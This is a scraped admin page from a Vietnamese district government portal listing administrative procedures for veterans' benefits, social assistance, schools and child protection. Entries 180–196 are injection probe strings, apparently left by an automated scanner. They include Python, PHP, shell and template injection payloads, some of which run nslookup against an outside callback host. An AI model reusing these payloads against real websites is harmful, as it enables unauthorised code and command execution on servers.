Quản lý Thủ Tục Hành Chính

Cơ quan thực hiện
Lĩnh vực
Từ khóa
STT Tên thủ tục Mức độ Cơ quan thực hiện
1 1 1 Cấp Quận
2 1 1 Cấp Quận
3 1 1 Cấp Quận
4 1 1 Cấp Quận
5 1 1 Cấp Quận
6 1 1 Cấp Quận
7 1 1 Cấp Quận
8 1 1 Cấp Quận
9 1 1 Cấp Quận
10 1 1 Cấp Quận
11 1 1 Cấp Quận
12 1 1 Cấp Quận
13 1 1 Cấp Quận
14 1 1 Cấp Quận
15 1 1 Cấp Quận
16 1 1 Cấp Quận
17 1 1 Cấp Quận
18 1 1 Cấp Quận
19 1 1 Cấp Quận
20 1 1 Cấp Quận

  Admin thu tuc hanh chinh

Cơ quan thực hiện
Lĩnh vực
Từ khóa
# Tên thủ tục Ngày tạo Trạng thái Thao tác
101 Thủ tục 02: Xác nhận giải quyết chế độ đối ưu đãi với thân nhân liệt sĩ 1 Năm qua Đã đăng Xóa
102 Thủ tục 02: Xác nhận giải quyết chế độ đối ưu đãi với thân nhân liệt sĩ 3 Năm qua Đã đăng Xóa
103 Thủ tục 02: Đăng ký hoạt động thư viện tư nhân có vốn sách ban đầu từ 500 bản đến dưới 1.000 bản 3 Năm qua Đã đăng Xóa
104 Thủ tục 03: Công nhận Câu lạc bộ thể thao cơ sở 3 Năm qua Đã đăng Xóa
105 Thủ tục 03: Xác nhận đề nghị giải quyết chế độ đối với Anh hùng lực lượng vũ trang nhân dân, Anh hùng lao động trong thời kỳ kháng chiến 3 Năm qua Đã đăng Xóa
106 Thủ tục 04: Xác nhận đơn giải quyết chế độ ưu đãi đối với Bà mẹ Việt Nam anh hùng 3 Năm qua Đã đăng Xóa
107 Thủ tục 05 : Xác nhận hưởng mai táng phí, trợ cấp một lần khi người có công với cách mạng từ trần 3 Năm qua Đã đăng Xóa
108 Thủ tục 06: Xác nhận đề nghị hưởng trợ cấp tiền tuất hàng tháng khi người có công từ trần 3 Năm qua Đã đăng Xóa
109 Thủ tục 07: Xác nhận đơn đề nghị chứng nhận người có công với cách mạng 3 Năm qua Đã đăng Xóa
110 Thủ tục 08: Tiếp nhận và xét duyệt hồ sơ (theo thẩm quyền) giải quyết chế độ chính sách đối với quân nhân tham gia kháng chiến chống Mỹ cứu nước dưới 20 năm công tác trong quân đội đã phục viên xuất ngũ về địa phương đã từ trần. 3 Năm qua Đã đăng Xóa
111 Thủ tục 09: Xác nhận giải quyết chế độ người HĐKC giải phóng dân tộc, bảo vệ tổ quốc và làm nghĩa vụ quốc tế 3 Năm qua Đã đăng Xóa
112 Thủ tục 11: Xác nhận đơn đề nghị di chuyển hồ sơ người có công với cách mạng 3 Năm qua Đã đăng Xóa
113 Thủ tục 12: Xác nhận đơn đề nghị đổi hoặc cấp lại Bằng Tổ quốc ghi công 3 Năm qua Đã đăng Xóa
114 Thủ tục 13 : Xác nhận đơn xin công nhận liệt sỹ (thương binh loại A, chết do vết thương tái phát) 3 Năm qua Đã đăng Xóa
115 Thủ tục 14 : Tiếp nhận và xét duyệt hồ sơ (theo thẩm quyền) giải quyết chế độ chính sách đối với quân nhân tham gia kháng chiến chống Mỹ cứu nước dưới 15 năm công tác trong quân đội đã phục viên, xuất ngũ về địa phương. 3 Năm qua Đã đăng Xóa
116 Thủ tục 15 : Xác nhận đơn đề nghị giải quyết chế độ chính sách đối với bệnh binh, người phục vụ bệnh binh tại nhà 3 Năm qua Đã đăng Xóa
117 Thủ tục 16: Xác nhận đề nghị giải quyết trợ cấp một lần đối với thanh niên xung phong đã hoàn thành nhiệm vụ trong kháng chiến 3 Năm qua Đã đăng Xóa
118 Thủ tục 17: Xác nhận đơn đề nghị giải quyết trợ cấp hàng tháng đối với thanh niên xung phong đã hoàn thành nhiệm vụ trong kháng chiến 3 Năm qua Đã đăng Xóa
119 Thủ tục 18: Xác nhận giải quyết chế độ người có công giúp đỡ cách mạng 3 Năm qua Đã đăng Xóa
120 Thủ tục 19: Cho phép hoạt động giáo dục đối với trường phổ thông tư tục có nhiều cấp học (cấp cao nhất là THCS) 2 Năm qua Đã đăng Xóa
121 Thủ tục 19: Xác nhận mua bảo hiểm y tế đối với người có công và thân nhân 3 Năm qua Đã đăng Xóa
122 Thủ tục 20: Sáp nhập, chia tách trường phổ thông tư thục có nhiều cấp học (cấp cao nhất là THCS) 2 Năm qua Đã đăng Xóa
123 Thủ tục 20: Xác nhận vào đơn đề nghị di chuyển hài cốt liệt sĩ; đơn đề nghị thăm viếng mộ liệt sĩ 3 Năm qua Đã đăng Xóa
124 Thủ tục 21: Giải thể trường phổ thông tư tục có nhiều cấp học (cấp cao nhất là THCS) 2 Năm qua Đã đăng Xóa
125 Thủ tục 21: Xác nhận đơn đề nghị cấp, (đổi) Giấy chứng nhận Gia đình liệt sỹ 3 Năm qua Đã đăng Xóa
126 Thủ tục 22: Cho phép hoạt động trở lại đối với trường phổ thông tư tục có nhiềucấp học (cấp cao nhất là THCS) 2 Năm qua Đã đăng Xóa
127 Thủ tục 22: Xác nhận đơn đề nghị cấp lại, đổi giấy chứng nhận thương binh, bệnh binh 3 Năm qua Đã đăng Xóa
128 Thủ tục 23. Chuyển trường và tiếp nhận học sinh cấp THCS 2 Năm qua Đã đăng Xóa
129 Thủ tục 23: Xác nhận thực hiện chế độ ưu đãi trong giáo dục đào tạo đối với người có công với cách mạng và con của họ 3 Năm qua Đã đăng Xóa
130 Thủ tục 24. Công nhận xã, phường đạt chuẩn phổ cập, xóa mù chữ. 2 Năm qua Đã đăng Xóa
131 Thủ tục 24: Xác nhận giải quyết hưởng chế độ ưu đãi đối với người hoạt động kháng chiến bị nhiễm chất độc hóa học 3 Năm qua Đã đăng Xóa
132 Thủ tục 25. Quy trình đánh giá “ Học tập cộng đồng” cấp xã. 2 Năm qua Đã đăng Xóa
133 Thủ tục 25: Xác nhận đơn đề nghị cấp thẻ xe buýt miễn phí cho người có công với cách mạng 3 Năm qua Đã đăng Xóa
134 Thủ tục 26. Đính chính, cấp lại bản sao bằng tốt nghiệp THCS . 2 Năm qua Đã đăng Xóa
135 Thủ tục 26: Xác nhận giải quyết chế độ trợ cấp đối với vợ hoặc chồng liệt sĩ đi lấy chồng hoặc vợ khác 3 Năm qua Đã đăng Xóa
136 Thủ tục 27: Xác nhận giải quyết chế độ Bảo hiểm y tế với Cựu chiến binh theo Nghị định 150/2006/NĐ-CP ngày 12/12/2006 của Chính phủ quy định chi tiết và hướng dẫn thực hiện một số điều của Pháp lệnh Cựu chiến binh 3 Năm qua Đã đăng Xóa
137 Thủ tục 28: Cấp phép, gia hạn giấy phép tổ chức dạy thêm học thêm trong nhà trường cấp THCS 2 Năm qua Đã đăng Xóa
138 Thủ tục 28: Xác nhận giải quyết chế độ mai táng phí đối với Cựu chiến binh theo Nghị định 150/2006/NĐ - CP ngày 12/12/2006 của Chính phủ quy định chi tiết và hướng dẫn thực hiện một số điều của Pháp lệnh Cựu chiến binh 3 Năm qua Đã đăng Xóa
139 Thủ tục 29: Cấp phép, gia hạn giấy phép tổ chức dạy thêm học thêm ngoài nhà trường cấp THCS 2 Năm qua Đã đăng Xóa
140 Thủ tục 29: Xác nhận đơn đề nghị cấp thẻ bảo hiểm y tế đối với thanh niên xung phong, người tham gia kháng chiến theo Quyết định 290/2005/QĐ-TTg của Thủ tướng Chính phủ 3 Năm qua Đã đăng Xóa
141 Thủ tục 30: Xác nhận đơn đề nghị công nhận danh hiệu "Bà mẹ Việt Nam anh hùng". 3 Năm qua Đã đăng Xóa
142 Thủ tục 31: Thực hiện, điều chỉnh, thôi hưởng trợ cấp xã hội hàng tháng đối với các đối tượng bảo trợ xã hội (bao gồm cả người KT, người khuyết tật mang thai nuôi con dưới 36 tháng tuổi): 3 Năm qua Đã đăng Xóa
143 Thủ tục 32: Xác nhận hộ nghèo, hộ cận nghèo, hoàn cảnh khó khăn; trẻ em có hoàn cảnh khó khăn, đặc biệt khó khăn; xác nhận học sinh tiểu học, THCS, THPT, sinh viên thuộc đối tượng hưởng chính sách con hộ nghèo. 3 Năm qua Đã đăng Xóa
144 Thủ tục 33: Thủ tục xác nhận đơn đề nghị cấp thẻ đi xe buýt miễn phí cho người tàn tật 3 Năm qua Đã đăng Xóa
145 Thủ tục 34: Xác nhận đơn đề nghị hỗ trợ chi phí mai táng cho đối tượng bảo trợ xã hội (được trợ giúp xã hội thường xuyên tại cộng đồng) 3 Năm qua Đã đăng Xóa
146 Thủ tục 35: Hỗ trợ kinh phí chăm sóc, nuôi dưỡng đối tượng bảo trợ xã hội (bao gồm cả đối tượng NKT đặc biệt nặng) 3 Năm qua Đã đăng Xóa
147 Thủ tục 36: Thủ tục tiếp nhận vào cơ sở bảo trợ xã hội đối với đối tượng bảo trợ xã hội có hoàn cảnh đặc biệt khó khăn: 3 Năm qua Đã đăng Xóa
148 Thủ tục 37: Xác nhận đơn đề nghị cấp thẻ BHYT đối với người đang hưởng chế độ bảo trợ xã hội hàng tháng 3 Năm qua Đã đăng Xóa
149 Thủ tục 38: Xác nhận đơn vay vốn cho hộ nghèo, cận nghèo 3 Năm qua Đã đăng Xóa
150 Thủ tục 39: Xác nhận hồ sơ đề nghị giải quyết chế độ trợ cấp 1 lần; bảo hiểm y tế theo Quyết định số 62/2011/QĐ-TTg với đối tượng tham gia chiến tranh bảo vệ tổ quốc, làm nhiệm vụ quốc tế ở Cam-pu-chi-a, giúp Lào sau 30/4/1975 đã phục viên, xuất ngũ, thôi việc 3 Năm qua Đã đăng Xóa
151 Thủ tục 40: Xác nhận giải quyết chế độ mai táng phí theo Quyết định số 62/2011/QĐ-TTg đối với đối tượng tham gia chiến tranh bảo vệ Tổ quốc, làm nhiệm vụ quốc tế ở Cam-pu-chi-a, giúp bạn Lào sau ngày 30/4/1975 đã phục viên, xuất ngũ, thôi việc 3 Năm qua Đã đăng Xóa
152 Thủ tục 41: Xác định, xác định lại mức độ khuyết tật và cấp Giấy xác nhận khuyết tật 3 Năm qua Đã đăng Xóa
153 Thủ tục 42: Thủ tục tiếp nhận vào cơ sở bảo trợ xã hội đối với đối tượng cần bảo vệ khẩn cấp 3 Năm qua Đã đăng Xóa
154 Thủ tục 43: Xác nhận giải quyết chế độ người hoạt động cách mạng hoặc hoạt động kháng chiến bị địch bắt tù, đày 3 Năm qua Đã đăng Xóa
155 Thủ tục 44: Trợ giúp xã hội đột xuất về hỗ trợ làm nhà ở, sửa chữa nhà ở: 3 Năm qua Đã đăng Xóa
156 Thủ tục 45: Trợ giúp xã hội đột xuất về hỗ trợ chi phí mai táng 3 Năm qua Đã đăng Xóa
157 Thủ tục 46: Thực hiện trợ cấp xã hội hàng tháng khi đối tượng thay đổi nơi cư trú trong cùng địa bàn quận, huyện, thị xã, thành phố thuộc tỉnh 3 Năm qua Đã đăng Xóa
158 Thủ tục 47: Thực hiện trợ cấp xã hội hàng tháng khi đối tượng thay đổi nơi cư trú giữa các quận, huyện, thị xã, thành phố thuộc tỉnh 3 Năm qua Đã đăng Xóa
159 Thủ tục 48: Giải quyết trợ cấp một lần đối với người có thành tích tham gia kháng chiến đã được tặng Bằng khen của Thủ tướng Chính phủ, Bằng khen của Chủ tịch Hội đồng Bộ trưởng hoặc Bằng khen của Bộ trưởng, Thủ trưởng cơ quan ngang bộ, Thủ trưởng cơ quan thuộc Chính phủ, Bằng khen của Chủ tịch Ủy ban nhân dân tỉnh, thành phố trực thuộc Trung ương 3 Năm qua Đã đăng Xóa
160 Thủ tục 49: Giải quyết chế độ đối với người hoạt động cách mạng trước ngày 01/01/1945 3 Năm qua Đã đăng Xóa
161 Thủ tục 50: Giải quyết chế độ đối với người hoạt động cách mạng từ ngày 01/01/1945 đến ngày ngày khởi nghĩa tháng Tám năm 1945 3 Năm qua Đã đăng Xóa
162 Thủ tục 51: Xác nhận liệt sĩ đối với người thuộc lực lượng quân đội, công an hy sinh trong chiến tranh từ ngày 31/12/1991 trở về trước không còn giấy tờ 3 Năm qua Đã đăng Xóa
163 Thủ tục 52: Xác nhận liệt sĩ đối với người hy sinh không thuộc lực lượng quân đội, công an hy sinh trong chiến tranh từ ngày 31/12/1991 trở về trước không còn giấy tờ 3 Năm qua Đã đăng Xóa
164 Thủ tục 53: Xác nhận đơn giải quyết chế độ trợ cấp thờ cúng liệt sĩ 3 Năm qua Đã đăng Xóa
165 Thủ tục 54: Xác nhận thực hiện chế độ trợ cấp một lần đối với thân nhân người hoạt động kháng chiến giải phóng dân tộc, bảo vệ Tổ quốc và làm nhiệm vụ quốc tế, người có công giúp đỡ cách mạng đã chết 3 Năm qua Đã đăng Xóa
166 Thủ tục 55: Xác nhận thương binh, người hưởng chính sách như thương binh đối với người bị thương không thuộc lực lượng công an, quân đội trong chiến tranh từ ngày 31/12/1991 trở về trước không còn giấy tờ 3 Năm qua Đã đăng Xóa
167 Thủ tục 56: Xác nhận bổ sung tình hình thân nhân trong hồ sơ liệt sĩ 3 Năm qua Đã đăng Xóa
168 Thủ tục 57: Xác nhận ủy quyền hưởng trợ cấp, phụ cấp ưu đãi 3 Năm qua Đã đăng Xóa
169 Thủ tục 58: Đổi, cấp lại Giấy xác nhận khuyết tật 3 Năm qua Đã đăng Xóa
170 Thủ tục 59: Xác nhận giải quyết hưởng chế độ ưu đãi đối với con đẻ của người hoạt động kháng chiến bị nhiễm chất độc hóa học 3 Năm qua Đã đăng Xóa
171 Thủ tục 60: Công nhận hộ nghèo, hộ cận nghèo phát sinh trong năm 3 Năm qua Đã đăng Xóa
172 Thủ tục 61: Công nhận hộ thoát nghèo, hộ thoát cận nghèo phát sinh trong năm 3 Năm qua Đã đăng Xóa
173 Thủ tục 62: Áp dụng các biện pháp can thiệp khẩn cấp hoặc tạm thời cách ly trẻ em khỏi môi trường hoặc người gây tổn hại trẻ em 3 Năm qua Đã đăng Xóa
174 Thủ tục 63: Chấm dứt việc chăm sóc thay thế cho trẻ em 3 Năm qua Đã đăng Xóa
175 Thủ tục 64: Phê duyệt kế hoạch hỗ trợ, can thiệp đối với trẻ em bị xâm hại hoặc có nguy cơ bị bạo lực, bóc lột, bỏ rơi và trẻ em có hoàn cảnh đặt biệt 3 Năm qua Đã đăng Xóa
176 Thủ tục 65: Đăng ký nhận chăm sóc thay thế cho trẻ em đối với cá nhân, người đại diện gia đình nhận chăm sóc thay thế không phải là người thân thích của trẻ em 3 Năm qua Đã đăng Xóa
177 Thủ tục 66: Thông báo nhận chăm sóc thay thế cho trẻ em đối với cá nhân, người đại diện gia đình nhận chăm sóc thay thế là người thân thích của trẻ em 3 Năm qua Đã đăng Xóa
178 Thủ tục 67: Chuyển trẻ em đang được chăm sóc thay thế tại cơ sở trợ giúp xã hội đến cá nhân, gia đình nhận chăm sóc thay thế 3 Năm qua Đã đăng Xóa
179 Thủ tục số 04: Chuyển đổi chủ nhóm trẻ, lớp mẫu giáo độc lập 2 Năm qua Đã đăng Xóa
180 "+response.write(9737989*9053139)+" 1 Năm qua Đã đăng Xóa
181 "+str(__import__('time').sleep(9))+__import__('os').popen('nslookup hity6JiwK6HQtad1fd.'+'bxss.me').read()+" 1 Năm qua Đã đăng Xóa
182 ";print(md5(31337));$a=" 1 Năm qua Đã đăng Xóa
183 #{9999368+9999836} 1 Năm qua Đã đăng Xóa
184 $(nslookup hitexEqPKtO2jd926c.bxss.me) 1 Năm qua Đã đăng Xóa
185 ${9999368+9999836} 1 Năm qua Đã đăng Xóa
186 ${@print(md5(31337))} 1 Năm qua Đã đăng Xóa
187 ${@print(md5(31337))}\ 1 Năm qua Đã đăng Xóa
188 &nslookup hitZU6R7J6arXf53b3.bxss.me&'\"`0&nslookup hitZU6R7J6arXf53b3.bxss.me&`' 1 Năm qua Đã đăng Xóa
189 '" 1 Năm qua Đã đăng Xóa
190 '"()&% 1 Năm qua Đã đăng Xóa
191 '+response.write(9737989*9053139)+' 1 Năm qua Đã đăng Xóa
192 '+str(__import__("time").sleep(9))+__import__("os").popen("nslookup hity6JiwK6HQtad1fd."+"bxss.me").read()+' 1 Năm qua Đã đăng Xóa
193 ';print(md5(31337));$a=' 1 Năm qua Đã đăng Xóa
194 ))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) 1 Năm qua Đã đăng Xóa
195 /xfs.bxss.me 1 Năm qua Đã đăng Xóa
196 1����%2527%2522 1 Năm qua Đã đăng Xóa
197 1 1 Năm qua Đã đăng Xóa
198 1 1 Năm qua Đã đăng Xóa
199 1 1 Năm qua Đã đăng Xóa
200 1 1 Năm qua Đã đăng Xóa